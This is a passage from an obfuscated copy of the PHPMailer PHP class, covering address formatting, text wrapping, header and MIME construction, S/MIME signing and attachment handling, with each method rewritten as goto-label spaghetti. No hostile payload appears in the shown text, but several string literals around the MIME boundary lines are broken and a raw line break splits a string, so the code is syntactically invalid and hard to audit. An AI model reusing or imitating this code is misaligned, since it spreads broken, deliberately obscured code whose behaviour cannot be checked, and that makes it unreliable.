$this->language; } public function addrAppend($type, $addr) { goto xYI_l; zKQd4: return $type . ": " . implode(", ", $addresses) . $this->LE; goto zx4fl; fLPHd: wWop5: goto zKQd4; A2dMB: foreach ($addr as $address) { $addresses[] = $this->addrFormat($address); bj4oC: } goto fLPHd; xYI_l: $addresses = array(); goto A2dMB; zx4fl: } public function addrFormat($addr) { goto hvA63; hvA63: if (empty($addr[1])) { goto G0SlG; } goto PEIy7; fpbaz: goto wxneq; goto ovyuF; ovyuF: G0SlG: goto aLb_i; aLb_i: return $this->secureHeader($addr[0]); goto wKqAi; PEIy7: return $this->encodeHeader($this->secureHeader($addr[1]), "phrase") . " <" . $this->secureHeader($addr[0]) . ">"; goto fpbaz; wKqAi: wxneq: goto G4H6O; G4H6O: } public function wrapText($message, $length, $qp_mode = false) { goto fMYaQ; fMYaQ: if ($qp_mode) { goto RgeBc; } goto Qwqoi; q8G4O: $soft_break = sprintf(" =%s", $this->LE); goto nVhMF; tJRop: $crlflen = strlen(self::CRLF); goto PYMO2; Ei5cF: if (!(substr($message, -$lelen) == $this->LE)) { goto CQ4PK; } goto fnd2J; LSCKb: foreach ($lines as $line) { goto isIaU; F2uo9: $firstword = true; goto AIJUG; UfeZZ: $message .= $buf . self::CRLF; goto yRMRe; isIaU: $words = explode(" ", $line); goto KaKFc; JkDrl: DSr9L: goto UfeZZ; yRMRe: P3KEo: goto BZ2eu; KaKFc: $buf = ''; goto F2uo9; AIJUG: foreach ($words as $word) { goto lfCku; lfCku: if ($qp_mode and strlen($word) > $length) { goto SbVk8; } goto gCEfj; JeWDn: pdUbu: goto nMnR9; jNGTk: XcQ0w: goto gEsHd; Dbyyy: $len--; goto AECJy; nMnR9: if (!(strlen($word) > 0)) { goto HYBLk; } goto oiQNR; whpFg: HC7zm: goto jOI8q; b41rw: $len -= 2; goto Bl7fa; I6xSK: rOKrY: goto sJmO5; K7a2z: goto rMKy4; goto SWu96; ln4fA: goto HYBLk; goto TUFtk; oiQNR: if (!($length <= 0)) { goto yDwQh; } goto ln4fA; ERoOR: WVKXp: goto imS5N; ob0Mh: $message .= $buf_o . $soft_break; goto uA11F; XPWgn: $len = $this->utf8CharBoundary($word, $len); goto zudYL; vggz4: if ($space_left > 20) { goto WVKXp; } goto kgqa6; C_WjY: if ($firstword) { goto axRQb; } goto vggz4; dKkUB: Vls63: goto b41rw; Uwgrm: goto HNUkc; goto n60Ln; zudYL: goto rMKy4; goto c735x; GW3d1: if (substr($word, $len - 2, 1) == "=") { goto Vls63; } goto K7a2z; imS5N: $len = $space_left; goto L2jUn; YRKQh: Io6B9: goto G692L; UL0N3: nW73_: goto hfJ0g; aty3G: $len -= 2; goto t0xKT; jOI8q: $firstword = false; goto I6xSK; c735x: izQZL: goto Dbyyy; pQIRH: $part = substr($word, 0, $len); goto y1EgH; SR4xD: goto Io6B9; goto izcog; gCEfj: $buf_o = $buf; goto axeo0; YL2o4: $buf = $part; goto SR4xD; Xa5t1: $len = $this->utf8CharBoundary($word, $len); goto SH9XM; hfJ0g: goto HC7zm; goto W0oqF; L2jUn: if ($is_utf8) { goto d1Uj7; } goto JzrgC; NomQ1: $buf .= $word; goto XyDQg; G692L: goto pdUbu; goto y1u5B; gEsHd: $len--; goto MMFpp; axeo0: if ($firstword) { goto LZtyD; } goto XCAtM; UtQUD: if (substr($word, $len - 1, 1) == "=") { goto XcQ0w; } goto jbNBF; geftZ: if (strlen($word) > 0) { goto Siqgd; } goto YL2o4; n60Ln: NhKFX: goto Xa5t1; czsHH: $space_left = $length - strlen($buf) - $crlflen; goto C_WjY; GK5jH: $message .= $part . sprintf("=%s", self::CRLF); goto YRKQh; ebuQR: goto bErBE; goto ERoOR; X3sNe: axRQb: goto JeWDn; kgqa6: $message .= $buf . $soft_break; goto ebuQR; Bl7fa: rMKy4: goto uER3p; OkrQQ: bErBE: goto ABtVV; B8z3T: $len = $length; goto kzGTt; W0oqF: SbVk8: goto czsHH; skt0z: $buf .= " " . $part; goto dT1rF; TUFtk: yDwQh: goto B8z3T; XyDQg: if (!(strlen($buf) > $length and $buf_o != '')) { goto nW73_; } goto ob0Mh; uER3p: $part = substr($word, 0, $len); goto Ur6Wb; y1u5B: HYBLk: goto whpFg; izcog: Siqgd: goto GK5jH; ABtVV: $buf = ''; goto X3sNe; t0xKT: HNUkc: goto pQIRH; MMFpp: goto HNUkc; goto pou0F; y1EgH: $word = substr($word, $len); goto geftZ; jbNBF: if (substr($word, $len - 2, 1) == "=") { goto WR1Cd; } goto Uwgrm; pou0F: WR1Cd: goto aty3G; SH9XM: goto HNUkc; goto jNGTk; AECJy: goto rMKy4; goto dKkUB; SWu96: d1Uj7: goto XPWgn; ogU8X: LZtyD: goto NomQ1; uA11F: $buf = $word; goto UL0N3; kzGTt: if ($is_utf8) { goto NhKFX; } goto UtQUD; JzrgC: if (substr($word, $len - 1, 1) == "=") { goto izQZL; } goto GW3d1; XCAtM: $buf .= " "; goto ogU8X; Ur6Wb: $word = substr($word, $len); goto skt0z; dT1rF: $message .= $buf . sprintf("=%s", self::CRLF); goto OkrQQ; sJmO5: } goto JkDrl; BZ2eu: } goto c1e9g; G8RnP: CQ4PK: goto rDyvE; c2HKa: $is_utf8 = strtolower($this->CharSet) == "utf-8"; goto itsDH; PYMO2: $message = $this->fixEOL($message); goto Ei5cF; OwLd7: return $message; goto z4leb; nVhMF: cX2Hs: goto c2HKa; ai1gz: $message = ''; goto LSCKb; bQ7N9: goto cX2Hs; goto f0F_D; f0F_D: RgeBc: goto q8G4O; c1e9g: Byu7r: goto OwLd7; fnd2J: $message = substr($message, 0, -$lelen); goto G8RnP; rDyvE: $lines = explode($this->LE, $message); goto ai1gz; itsDH: $lelen = strlen($this->LE); goto tJRop; Qwqoi: $soft_break = $this->LE; goto bQ7N9; z4leb: } public function utf8CharBoundary($encodedText, $maxLength) { goto yENJB; YU0NN: $maxLength = $maxLength - ($lookBack - $encodedCharPos); goto mPYZR; gaovr: MkKzK: goto jjhvM; KBAXe: $lookBack = 3; goto xTZZv; SDbx8: if ($dec < 128) { goto ZGUlM; } goto c9KHI; kDWCl: Ie2YC: goto rI4PA; XJY6n: if (!($encodedCharPos > 0)) { goto zAOJw; } goto YU0NN; C8F5w: LkRhH: goto hE6np; tjNet: goto kzvGW; goto C8F5w; xTZZv: kzvGW: goto hzmNM; hzmNM: if ($foundSplitPos) { goto LkRhH; } goto QVsE7; jjhvM: $maxLength = $maxLength - ($lookBack - $encodedCharPos); goto dpvgp; l6lVV: goto JN4XV; goto NcDe_; mPYZR: zAOJw: goto IXDnV; NJo2E: OgTWs: goto tjNet; NcDe_: ZGUlM: goto XJY6n; dpvgp: $foundSplitPos = true; goto Y66AV; IXDnV: $foundSplitPos = true; goto tv6hf; JcQHC: $dec = hexdec($hex); goto SDbx8; Te6cX: goto OgTWs; goto j6xKX; Y66AV: goto JN4XV; goto kDWCl; u6kIO: $hex = substr($encodedText, $maxLength - $lookBack + $encodedCharPos + 1, 2); goto JcQHC; o0CKc: JN4XV: goto NJo2E; hE6np: return $maxLength; goto nGvfL; yENJB: $foundSplitPos = false; goto KBAXe; a5eax: if (false !== $encodedCharPos) { goto mhWI6; } goto fjp6V; QVsE7: $lastChunk = substr($encodedText, $maxLength - $lookBack, $lookBack); goto Oc19c; Oc19c: $encodedCharPos = strpos($lastChunk, "="); goto a5eax; c9KHI: if ($dec >= 192) { goto MkKzK; } goto DhkPI; tv6hf: goto JN4XV; goto gaovr; DhkPI: if ($dec < 192) { goto Ie2YC; } goto l6lVV; fjp6V: $foundSplitPos = true; goto Te6cX; rI4PA: $lookBack += 3; goto o0CKc; j6xKX: mhWI6: goto u6kIO; nGvfL: } public function setWordWrap() { goto jyge7; jyge7: if (!($this->WordWrap < 1)) { goto Kv9sg; } goto oKW_q; oKW_q: return; goto l4vBl; Dlinn: ILvAt: goto cQIQR; dcMpa: switch ($this->message_type) { case "alt": case "alt_inline": case "alt_attach": case "alt_inline_attach": $this->AltBody = $this->wrapText($this->AltBody, $this->WordWrap); goto vK7kT; default: $this->Body = $this->wrapText($this->Body, $this->WordWrap); goto vK7kT; } goto Dlinn; cQIQR: vK7kT: goto OAdCS; l4vBl: Kv9sg: goto dcMpa; OAdCS: } public function createHeader() { goto CvOAg; J_luu: goto ny83j; goto PNh0P; Do0eK: $result .= $this->headerLine("Message-ID", $this->lastMessageID); goto X8m7C; sinTT: E3oMB: goto Y1tMb; mZHQ2: if (!($this->Mailer != "mail")) { goto E3oMB; } goto ujE1J; tll7O: kn20h: goto Fg_dD; ryF2Q: $result .= $this->headerLine("X-Mailer", $myXmailer); goto BfJ2O; Cl0Rp: lr3vG: goto FsGAv; JQmCx: ips3j: goto aY6vG; AUCrv: goto YIaKT; goto B_qv3; rkwx9: $result .= $this->addrAppend("Reply-To", $this->ReplyTo); goto dzBO0; hlLQD: goto jOopP; goto tll7O; UUWde: foreach ($this->to as $toaddr) { $this->SingleToArray[] = $this->addrFormat($toaddr); VPTS0: } goto Lx4Od; B_qv3: vhfkV: goto A032f; FgTnj: if ($this->XMailer == '') { goto ips3j; } goto TFjdp; m8QxC: $result .= $this->addrAppend("From", array(array(trim($this->From), $this->FromName))); goto Znyvv; Znyvv: if (!(count($this->cc) > 0)) { goto fjuGc; } goto YZsOl; LaX4A: $result .= $this->getMailMIME(); goto r5E0m; qzyLI: if (!$myXmailer) { goto FUrqk; } goto ryF2Q; Qg786: $result .= $this->addrAppend("Bcc", $this->bcc); goto rYKKi; kOunS: if (!(($this->Mailer == "sendmail" or $this->Mailer == "qmail" or $this->Mailer == "mail") and count($this->bcc) > 0)) { goto bPZXy; } goto Qg786; CvOAg: $result = ''; goto B8AJN; rYKKi: bPZXy: goto by540; USjgV: return $result; goto YwQbk; JGYcp: $result .= $this->headerLine("To", "undisclosed-recipients:;"); goto qUv2w; dzBO0: NmdCj: goto FBXfQ; qdw3s: if ('' != $this->MessageID and preg_match("/^<.*@.*>$/", $this->MessageID)) { goto vhfkV; } goto ensaw; Fg_dD: if (!($this->Mailer != "mail")) { goto uSKpk; } goto UUWde; LTOZn: YIaKT: goto Do0eK; FBXfQ: if (!($this->Mailer != "mail")) { goto giKP_; } goto sWIpK; Yk1AQ: goto ALprR; goto JQmCx; T3JG1: jOopP: goto m8QxC; A032f: $this->lastMessageID = $this->MessageID; goto LTOZn; W4Fot: fjuGc: goto kOunS; Lx4Od: FsLzp: goto ghtE0; HFbC7: if ($this->sign_key_file) { goto I4xty; } goto wQqlf; pUKEJ: bv3Y8: goto JGYcp; by540: if (!(count($this->ReplyTo) > 0)) { goto NmdCj; } goto rkwx9; B8AJN: $result .= $this->headerLine("Date", $this->MessageDate == '' ? self::rfcDate() : $this->MessageDate); goto jt14y; r5E0m: I4xty: goto USjgV; AOYxF: ZN8fi: goto HFbC7; wQqlf: $result .= $this->headerLine("MIME-Version", "1.0"); goto LaX4A; Lxn8r: giKP_: goto qdw3s; ghtE0: uSKpk: goto T3JG1; ujE1J: $result .= $this->addrAppend("To", $this->to); goto sinTT; Y1tMb: goto ny83j; goto pUKEJ; h0FBi: if (count($this->to) > 0) { goto uOqjO; } goto pz6oo; ensaw: $this->lastMessageID = sprintf("<%s@%s>", $this->uniqueid, $this->serverHostname()); goto AUCrv; TFjdp: $myXmailer = trim($this->XMailer); goto qzyLI; X8m7C: if (is_null($this->Priority)) { goto gjmqP; } goto gC1yt; aY6vG: $result .= $this->headerLine("X-Mailer", "PHPMailer " . $this->Version . " ("); goto g0btj; gC1yt: $result .= $this->headerLine("X-Priority", $this->Priority); goto QI1Oy; QI1Oy: gjmqP: goto FgTnj; BfJ2O: FUrqk: goto Yk1AQ; cz2gx: if (!($this->ConfirmReadingTo != '')) { goto lr3vG; } goto M5NO8; pz6oo: if (count($this->cc) == 0) { goto bv3Y8; } goto J_luu; jt14y: if ($this->SingleTo) { goto kn20h; } goto h0FBi; FsGAv: foreach ($this->CustomHeader as $header) { $result .= $this->headerLine(trim($header[0]), $this->encodeHeader(trim($header[1]))); lrcRs: } goto AOYxF; YZsOl: $result .= $this->addrAppend("Cc", $this->cc); goto W4Fot; PNh0P: uOqjO: goto mZHQ2; qUv2w: ny83j: goto hlLQD; M5NO8: $result .= $this->headerLine("Disposition-Notification-To", "<" . $this->ConfirmReadingTo . ">"); goto Cl0Rp; g0btj: ALprR: goto cz2gx; sWIpK: $result .= $this->headerLine("Subject", $this->encodeHeader($this->secureHeader($this->Subject))); goto Lxn8r; YwQbk: } public function getMailMIME() { goto vPFj_; HATPv: switch ($this->message_type) { case "inline": goto cteMg; aveB1: $result .= $this->textLine("\x9boundary="" . $this->boundary[1] . """); goto YR3Ug; cteMg: $result .= $this->headerLine("Content-Type", "multipart/related;"); goto aveB1; YR3Ug: goto LjKxy; goto AYQt9; AYQt9: case "attach": case "inline_attach": case "alt_attach": case "alt_inline_attach": goto vTdCD; phrpU: $result .= $this->textLine("	boundary="" . $this->boundary[1] . """); goto cRpBJ; cRpBJ: goto LjKxy; goto f28st; vTdCD: $result .= $this->headerLine("Content-Type", "multipart/mixed;"); goto phrpU; f28st: case "alt": case "alt_inline": goto FXIwQ; FXIwQ: $result .= $this->headerLine("Content-Type", "multipart/alternative;"); goto mHpQR; mHpQR: $result .= $this->textLine("\x9boundary="" . $this->boundary[1] . """); goto hz0bM; hz0bM: goto LjKxy; goto SPLrJ; SPLrJ: default: goto Tv7JA; A6jVH: goto LjKxy; goto ht631; Tv7JA: $result .= $this->textLine("Content-Type: " . $this->ContentType . "; charset=" . $this->CharSet); goto F0TVG; F0TVG: $ismultipart = false; goto A6jVH; ht631: } goto zpVVi; NgaFG: goto cBVj9; goto SJFtm; C0_Bj: return $result; goto jPQZr; vPFj_: $result = ''; goto ix7e5; SM8tk: if (!($this->Encoding != "7bit")) { goto WUeVj; } goto em16a; u5Bee: $result .= $this->headerLine("Content-Transfer-Encoding", "8bit"); goto rFFxf; zpVVi: q6Ubl: goto IbIh8; rFFxf: WQY3C: goto IOKkm; ix7e5: $ismultipart = true; goto HATPv; p82Fi: if (!($this->Mailer != "mail")) { goto cR43s; } goto lMs0e; ARtVA: cR43s: goto C0_Bj; eNRQS: WUeVj: goto p82Fi; em16a: if ($ismultipart) { goto Q_KNE; } goto mjbmf; mjbmf: $result .= $this->headerLine("Content-Transfer-Encoding", $this->Encoding); goto NgaFG; qsuSE: if (!($this->Encoding == "8bit")) { goto WQY3C; } goto u5Bee; IbIh8: LjKxy: goto SM8tk; IOKkm: cBVj9: goto eNRQS; lMs0e: $result .= $this->LE; goto ARtVA; SJFtm: Q_KNE: goto qsuSE; jPQZr: } public function getSentMIMEMessage() { return rtrim($this->MIMEHeader . $this->mailHeader, "
\xd") . self::CRLF . self::CRLF . $this->MIMEBody; } protected function generateId() { return md5(uniqid(time())); } public function createBody() { goto UGY_V; TbUIO: try { goto sr28E; TN5NQ: if ($sign) { goto w7fGh; } goto kMXUc; Cad2y: @unlink($signed); goto w6m4q; nqrAF: if (!(false === file_put_contents($file, $body))) { goto FZXwR; } goto G2Iyy; Ii0_M: @unlink($signed); goto CvgoA; CY1fD: w7fGh: goto STiFT; bRJQH: $body = $parts[1]; goto cb0el; y9aAw: $sign = @openssl_pkcs7_sign($file, $signed, "file://" . realpath($this->sign_cert_file), array("file://" . realpath($this->sign_key_file), $this->sign_key_pass), null); goto og4MP; og4MP: X3b23: goto TN5NQ; CFZus: throw new phpmailerException($this->lang("extension_missing") . "openssl"); goto jG2kB; cb0el: ZGGxS: goto uyzw2; FaWFN: $file = tempnam(sys_get_temp_dir(), "mail"); goto nqrAF; w6m4q: throw new phpmailerException($this->lang("signing") . openssl_error_string()); goto Q9AOp; rvRGa: $this->MIMEHeader .= $parts[0] . $this->LE . $this->LE; goto bRJQH; Q9AOp: goto ZGGxS; goto CY1fD; G2Iyy: throw new phpmailerException($this->lang("signing") . " Could not write temp file"); goto c2e70; vQ7UF: mERL2: goto y9aAw; STiFT: @unlink($file); goto BbcA8; kMXUc: @unlink($file); goto Cad2y; d8DIA: goto X3b23; goto vQ7UF; FNTnN: if (empty($this->sign_extracerts_file)) { goto mERL2; } goto ImJ5x; CvgoA: $parts = explode("\xa
", $body, 2); goto rvRGa; ImJ5x: $sign = @openssl_pkcs7_sign($file, $signed, "file://" . realpath($this->sign_cert_file), array("file://" . realpath($this->sign_key_file), $this->sign_key_pass), null, PKCS7_DETACHED, $this->sign_extracerts_file); goto d8DIA; c2e70: FZXwR: goto OjpC1; jG2kB: YiZM4: goto FaWFN; OjpC1: $signed = tempnam(sys_get_temp_dir(), "signed"); goto FNTnN; sr28E: if (defined("PKCS7_TEXT")) { goto YiZM4; } goto CFZus; BbcA8: $body = file_get_contents($signed); goto Ii0_M; uyzw2: } catch (phpmailerException $exc) { goto Ty3vW; BCKAG: if (!$this->exceptions) { goto GOSUA; } goto cwO0C; cwO0C: throw $exc; goto fqfPg; fqfPg: GOSUA: goto wGqbv; Ty3vW: $body = ''; goto BCKAG; wGqbv: } goto CN2gP; z2KFf: $bodyEncoding = $this->Encoding; goto ktK41; CGQqJ: $altBodyEncoding = "quoted-printable"; goto MUCXI; IPNIe: if ($this->sign_key_file) { goto Db5FO; } goto YwDyh; ktK41: $bodyCharSet = $this->CharSet; goto X6ePS; UGY_V: $body = ''; goto a7kM3; tfkHz: $bodyEncoding = "quoted-printable"; goto m1bbg; DHIMj: if (!$this->sign_key_file) { goto VuDuD; } goto BOc3d; PTNRB: if (!($altBodyEncoding == "8bit" and !$this->has8bitChars($this->AltBody))) { goto QoBBl; } goto kRxGD; pB30J: return $body; goto McI5k; yeix8: QvhDd: goto drK8i; iPRha: $altBodyCharSet = $this->CharSet; goto PTNRB; PDIx7: $altBodyEncoding = $this->Encoding; goto iPRha; td2MR: HNrWS: goto yeix8; drK8i: if ($this->isError()) { goto hc1eT; } goto IPNIe; X6ePS: if (!($bodyEncoding == "8bit" and !$this->has8bitChars($this->Body))) { goto mArpb; } goto qGC8k; m1bbg: imvJW: goto PDIx7; DWVCn: VuDuD: goto dEPDV; MRCrr: $altBodyCharSet = "us-ascii"; goto Im9Y_; qGC8k: $bodyEncoding = "7bit"; goto Zp11q; k5nsd: $this->boundary[2] = "b2_" . $this->uniqueid; goto X7n2r; AJsor: switch ($this->message_type) { case "inline": goto tML1V; tML1V: $body .= $mimepre; goto AI3w7; gYzUr: $body .= $this->attachAll("inline", $this->boundary[1]); goto UT3TZ; VAV8x: $body .= $this->encodeString($this->Body, $bodyEncoding); goto h19be; UT3TZ: goto QvhDd; goto pIoBx; h19be: $body .= $this->LE . $this->LE; goto gYzUr; AI3w7: $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, '', $bodyEncoding); goto VAV8x; pIoBx: case "attach": goto MuwLS; VFYED: goto QvhDd; goto n1POD; BL4u5: $body .= $this->encodeString($this->Body, $bodyEncoding); goto XhKVJ; MWUTL: $body .= $this->attachAll("attachment", $this->boundary[1]); goto VFYED; MuwLS: $body .= $mimepre; goto aelIJ; aelIJ: $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, '', $bodyEncoding); goto BL4u5; XhKVJ: $body .= $this->LE . $this->LE; goto MWUTL; n1POD: case "inline_attach": goto vZPbF; dwuN5: $body .= $this->LE; goto YUYX_; TkZ3s: $body .= $this->textLine("\x9boundary="" . $this->boundary[2] . """); goto dwuN5; p65M6: $body .= $this->attachAll("inline", $this->boundary[2]); goto eQMvR; D4p2a: $body .= $this->textLine("--" . $this->boundary[1]); goto S60km; S60km: $body .= $this->headerLine("Content-Type", "multipart/related;"); goto TkZ3s; dAcEf: $body .= $this->encodeString($this->Body, $bodyEncoding); goto N001h; EiP3e: $body .= $this->attachAll("attachment", $this->boundary[1]); goto KGUav; vZPbF: $body .= $mimepre; goto D4p2a; eQMvR: $body .= $this->LE; goto EiP3e; KGUav: goto QvhDd; goto JYaHP; N001h: $body .= $this->LE . $this->LE; goto p65M6; YUYX_: $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, '', $bodyEncoding); goto dAcEf; JYaHP: case "alt": goto RE48b; RE48b: $body .= $mimepre; goto oD2Q6; d4MGg: $body .= $this->encodeString($this->Ical, $this->Encoding); goto rGTt3; rJXjn: $body .= $this->endBoundary($this->boundary[1]); goto SSoMD; ZdVEg: $body .= $this->encodeString($this->Body, $bodyEncoding); goto wU0Io; ZARhU: $body .= $this->getBoundary($this->boundary[1], '', "text/calendar; method=REQUEST", ''); goto d4MGg; xSXqy: dQmMH: goto rJXjn; rGTt3: $body .= $this->LE . $this->LE; goto xSXqy; SuTM1: $body .= $this->LE . $this->LE; goto Hj6xp; v7Q7Q: $body .= $this->encodeString($this->AltBody, $altBodyEncoding); goto SuTM1; SSoMD: goto QvhDd; goto YG6LW; wU0Io: $body .= $this->LE . $this->LE; goto dO4Ta; oD2Q6: $body .= $this->getBoundary($this->boundary[1], $altBodyCharSet, "text/plain", $altBodyEncoding); goto v7Q7Q; Hj6xp: $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, "text/html", $bodyEncoding); goto ZdVEg; dO4Ta: if (empty($this->Ical)) { goto dQmMH; } goto ZARhU; YG6LW: case "alt_inline": goto aAqsx; Zu_uw: goto QvhDd; goto u0imD; o9dy3: $body .= $this->textLine("--" . $this->boundary[1]); goto eMVsv; D4yud: $body .= $this->encodeString($this->Body, $bodyEncoding); goto FAlUM; uC5TM: $body .= $this->encodeString($this->AltBody, $altBodyEncoding); goto xNvTh; MBfUg: $body .= $this->textLine("	boundary="" . $this->boundary[2] . """); goto XLkWy; k44MT: $body .= $this->LE; goto iINLx; iINLx: $body .= $this->endBoundary($this->boundary[1]); goto Zu_uw; aAqsx: $body .= $mimepre; goto fjxQP; vcPsN: $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, "text/html", $bodyEncoding); goto D4yud; eMVsv: $body .= $this->headerLine("Content-Type", "multipart/related;"); goto MBfUg; fjxQP: $body .= $this->getBoundary($this->boundary[1], $altBodyCharSet, "text/plain", $altBodyEncoding); goto uC5TM; QDkHd: $body .= $this->attachAll("inline", $this->boundary[2]); goto k44MT; XLkWy: $body .= $this->LE; goto vcPsN; xNvTh: $body .= $this->LE . $this->LE; goto o9dy3; FAlUM: $body .= $this->LE . $this->LE; goto QDkHd; u0imD: case "alt_attach": goto zVW5I; haqJl: $body .= $this->endBoundary($this->boundary[2]); goto kQSDf; iF1eU: $body .= $this->getBoundary($this->boundary[2], $altBodyCharSet, "text/plain", $altBodyEncoding); goto vkotL; Pl3EV: $body .= $this->textLine("--" . $this->boundary[1]); goto kMRvd; zVW5I: $body .= $mimepre; goto Pl3EV; kQSDf: $body .= $this->LE; goto U1heM; M3P64: goto QvhDd; goto GvTgj; ymuMn: $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, "text/html", $bodyEncoding); goto xF8Mq; tF2Vl: $body .= $this->textLine("\x9boundary="" . $this->boundary[2] . """); goto tf1p8; kMRvd: $body .= $this->headerLine("Content-Type", "multipart/alternative;"); goto tF2Vl; tf1p8: $body .= $this->LE; goto iF1eU; U1heM: $body .= $this->attachAll("attachment", $this->boundary[1]); goto M3P64; uXlGv: $body .= $this->LE . $this->LE; goto haqJl; vkotL: $body .= $this->encodeString($this->AltBody, $altBodyEncoding); goto PVJhc; xF8Mq: $body .= $this->encodeString($this->Body, $bodyEncoding); goto uXlGv; PVJhc: $body .= $this->LE . $this->LE; goto ymuMn; GvTgj: case "alt_inline_attach": goto g4e8v; kOjuI: $body .= $this->encodeString($this->Body, $bodyEncoding); goto iliEh; wtvpa: $body .= $this->headerLine("Content-Type", "multipart/alternative;"); goto iQzgT; DpSs3: $body .= $this->LE; goto HuXsA; WKcyN: $body .= $this->LE; goto wq4sy; PGfoZ: $body .= $this->LE . $this->LE; goto zs03x; iQzgT: $body .= $this->textLine("	boundary="" . $this->boundary[2] . """); goto WKcyN; HuXsA: $body .= $this->getBoundary($this->boundary[3], $bodyCharSet, "text/html", $bodyEncoding); goto kOjuI; wq4sy: $body .= $this->getBoundary($this->boundary[2], $altBodyCharSet, "text/plain", $altBodyEncoding); goto bkDoP; iliEh: $body .= $this->LE . $this->LE; goto jCu5d; g4e8v: $body .= $mimepre; goto ATWyO; ATWyO: $body .= $this->textLine("--" . $this->boundary[1]); goto wtvpa; TJqW7: $body .= $this->LE; goto pNWzi; s1ELv: $body .= $this->endBoundary($this->boundary[2]); goto TJqW7; oiBcr: $body .= $this->headerLine("Content-Type", "multipart/related;"); goto CmIjS; zs03x: $body .= $this->textLine("--" . $this->boundary[2]); goto oiBcr; pNWzi: $body .= $this->attachAll("attachment", $this->boundary[1]); goto LNwpw; CmIjS: $body .= $this->textLine("	boundary="" . $this->boundary[3] . """); goto DpSs3; jCu5d: $body .= $this->attachAll("inline", $this->boundary[3]); goto SIwkn; SIwkn: $body .= $this->LE; goto s1ELv; LNwpw: goto QvhDd; goto FsTTh; bkDoP: $body .= $this->encodeString($this->AltBody, $altBodyEncoding); goto PGfoZ; FsTTh: default: goto XXFBN; XXFBN: $this->Encoding = $bodyEncoding; goto lLg92; OtDrs: goto QvhDd; goto zGLz7; lLg92: $body .= $this->encodeString($this->Body, $this->Encoding); goto OtDrs; zGLz7: } goto td2MR; bQrQT: if (!("base64" != $this->Encoding and self::hasLineLongerThanMax($this->Body))) { goto imvJW; } goto tfkHz; X7n2r: $this->boundary[3] = "b3_" . $this->uniqueid; goto DHIMj; Zp11q: $bodyCharSet = "us-ascii"; goto uC31z; uC31z: mArpb: goto bQrQT; CnDBO: Db5FO: goto TbUIO; C0EiT: $this->boundary[1] = "b1_" . $this->uniqueid; goto k5nsd; BOc3d: $body .= $this->getMailMIME() . $this->LE; goto DWVCn; MUCXI: ISJs3: goto S3JOq; S3JOq: $mimepre = "This is a multi-part message in MIME format." . $this->LE . $this->LE; goto AJsor; RW6Bu: $body = ''; goto t2081; dEPDV: $this->setWordWrap(); goto z2KFf; tXBFK: hc1eT: goto RW6Bu; Im9Y_: QoBBl: goto ykuFg; ykuFg: if (!("base64" != $altBodyEncoding and self::hasLineLongerThanMax($this->AltBody))) { goto ISJs3; } goto CGQqJ; YwDyh: goto tKGMh; goto tXBFK; CN2gP: tKGMh: goto pB30J; a7kM3: $this->uniqueid = $this->generateId(); goto C0EiT; kRxGD: $altBodyEncoding = "7bit"; goto MRCrr; t2081: goto tKGMh; goto CnDBO; McI5k: } protected function getBoundary($boundary, $charSet, $contentType, $encoding) { goto L8I5y; ym7FT: if (!($encoding == '')) { goto ratm_; } goto kYSGj; jyByG: ratm_: goto r_Yux; L8I5y: $result = ''; goto L2oQ5; K6VsM: return $result; goto ZQXFc; kllXr: r3482: goto ym7FT; x7QYv: OljJx: goto LcA1x; kYSGj: $encoding = $this->Encoding; goto jyByG; LcA1x: if (!($contentType == '')) { goto r3482; } goto GBW1G; CMqYN: $result .= sprintf("Content-Type: %s; charset=%s", $contentType, $charSet); goto pduqX; GBW1G: $contentType = $this->ContentType; goto kllXr; xdPIR: $result .= $this->LE; goto K6VsM; tK12Q: $charSet = $this->CharSet; goto x7QYv; sVmr3: cFffu: goto xdPIR; vpqcA: if (!($encoding != "7bit")) { goto cFffu; } goto aVyzX; aVyzX: $result .= $this->headerLine("Content-Transfer-Encoding", $encoding); goto sVmr3; r_Yux: $result .= $this->textLine("--" . $boundary); goto CMqYN; L2oQ5: if (!($charSet == '')) { goto OljJx; } goto tK12Q; pduqX: $result .= $this->LE; goto vpqcA; ZQXFc: } protected function endBoundary($boundary) { return $this->LE . "--" . $boundary . "--" . $this->LE; } protected function setMessageType() { goto sqmFU; LSHig: $this->message_type = "plain"; goto Q3Zbi; ywAdw: $type[] = "attach"; goto cMrsb; ckbnV: if (!$this->alternativeExists()) { goto OZuZn; } goto dR8HB; sqmFU: $type = array(); goto ckbnV; V51Kk: if (!$this->attachmentExists()) { goto zuNme; } goto ywAdw; fKYwK: if (!$this->inlineImageExists()) { goto jI_J5; } goto VC6j1; YGTws: OZuZn: goto fKYwK; VC6j1: $type[] = "inline"; goto VHrRU; dR8HB: $type[] = "alt"; goto YGTws; VHrRU: jI_J5: goto V51Kk; yp_C7: $this->message_type = implode("_", $type); goto HUPTR; HUPTR: if (!($this->message_type == '')) { goto Tfnuj; } goto LSHig; Q3Zbi: Tfnuj: goto x0FJC; cMrsb: zuNme: goto yp_C7; x0FJC: } public function headerLine($name, $value) { return $name . ": " . $value . $this->LE; } public function textLine($value) { return $value . $this->LE; } public function addAttachment($path, $name = '', $encoding = "base64", $type = '', $disposition = "attachment") { try { goto Dpi04; zAy56: $filename = basename($path); goto VADrp; Kqdka: $name = $filename; goto XzMhd; XzMhd: LIQyV: goto sUbZm; qjnDQ: tGVoB: goto zAy56; sUbZm: $this->attachment[] = array(0 => $path, 1 => $filename, 2 => $name, 3 => $encoding, 4 => $type, 5 => false, 6 => $disposition, 7 => 0); goto BhIZz; hT6e0: $type = self::filenameToType($path); goto qjnDQ; Xn6TP: if (!($type == '')) { goto tGVoB; } goto hT6e0; dN0M0: b5Fuv: goto Xn6TP; VADrp: if (!($name == '')) { goto LIQyV; } goto Kqdka; Dpi04: if (!(!self::isPermittedPath($path) or !@is_file($path))) { goto b5Fuv; } goto oWxAS; oWxAS: throw new phpmailerException($this->lang("file_access") . $path, self::STOP_CONTINUE); goto dN0M0; BhIZz: } catch (phpmailerException $exc) { goto hMxdm; VLj2O: return false; goto yV0ju; s0xRO: if (!$this->exceptions) { goto AWBQZ; } goto dqU3V; hMxdm: $this->setError($exc->getMessage()); goto k5lGe; k5lGe: $this->edebug($exc->getMessage()); goto s0xRO; jkRbD: AWBQZ: goto VLj2O; dqU3V: throw $exc; goto jkRbD; yV0ju: } return true; } public function getAttachments() { return $this->attachment; } protected function 